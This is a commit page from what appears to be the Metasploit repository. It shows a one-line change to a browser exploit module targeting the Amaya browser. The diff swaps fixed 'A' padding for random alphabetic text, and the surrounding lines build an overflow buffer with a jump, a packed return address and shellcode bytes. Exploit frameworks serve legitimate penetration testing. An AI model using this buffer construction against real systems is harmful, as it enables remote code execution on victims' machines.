We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 66cb973 commit 32c02ddCopy full SHA for 32c02dd
modules/exploits/windows/browser/amaya_bdo.rb
@@ -54,7 +54,7 @@ def on_request_uri(cli, request)
54
55
# Set the exploit buffer
56
sploit = "<bdo dir=\""
57
- sploit += "\x41" * 6889
+ sploit += rand_text_alpha(6889)
58
sploit += "\x74\x06\x41\x41"
59
sploit += [target.ret].pack('V')
60
sploit += "\x68\x7f\x01\x01\x7f" # push 7F01017F
0 commit comments